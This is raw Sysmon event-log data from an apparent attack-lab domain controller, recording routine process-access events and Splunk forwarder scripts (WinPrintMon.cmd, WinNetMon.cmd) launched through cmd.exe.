15:51:20.706{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002181Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.706{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7C78-5FA1-6300-000000008801}4052C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002180Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.706{D28789B6-7C73-5FA1-3300-000000008801}26763952C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7C78-5FA1-6300-000000008801}4052C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002179Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.709{D28789B6-7C78-5FA1-6300-000000008801}4052C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinPrintMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002178Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.597{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C78-5FA1-6200-000000008801}4008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002177Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002176Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002175Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002174Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002173Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002172Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002171Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002170Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002169Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002168Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.597{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7C78-5FA1-6200-000000008801}4008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002167Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.597{D28789B6-7C73-5FA1-3300-000000008801}26763952C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7C78-5FA1-6200-000000008801}4008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002166Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.599{D28789B6-7C78-5FA1-6200-000000008801}4008C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinNetMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002165Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.488{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C78-5FA1-6100-000000008801}4080C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.488{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002163Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.488{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002162Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.488{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002161Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.488{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002160Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.488{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002159Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.488{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002158Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.488{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002157Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.488{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002156Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 